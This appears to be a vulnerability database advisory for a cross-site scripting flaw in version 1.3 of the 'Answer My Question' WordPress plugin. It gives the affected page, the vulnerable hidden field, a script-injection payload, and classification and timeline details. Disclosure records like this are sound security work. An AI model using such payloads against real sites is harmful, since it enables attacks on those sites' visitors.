Answer My Question 1.3 - Cross-Site Scripting (XSS)



Proof of Concept
Host: 10.194.0.44
URL: http://10.194.0.44/wp-content/plugins/answer-my-question/modal.php
Parameter: Hidden Field [id]
Payload:  "><script>alert(1)</script>

Affects Plugin

References

URL: https://wpvulndb.com/vulnerabilities/8669

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Submitter: Leon Teale
Submitter Twitter: leonteale
Views: 5195
Verified: No
WPVDB ID: 8800

Timeline

Publicly Published: 2017-04-24 (over 2 years ago)
Added: 2017-05-02 (over 2 years ago)
Last Updated: 2019-11-01 (about 1 month ago)
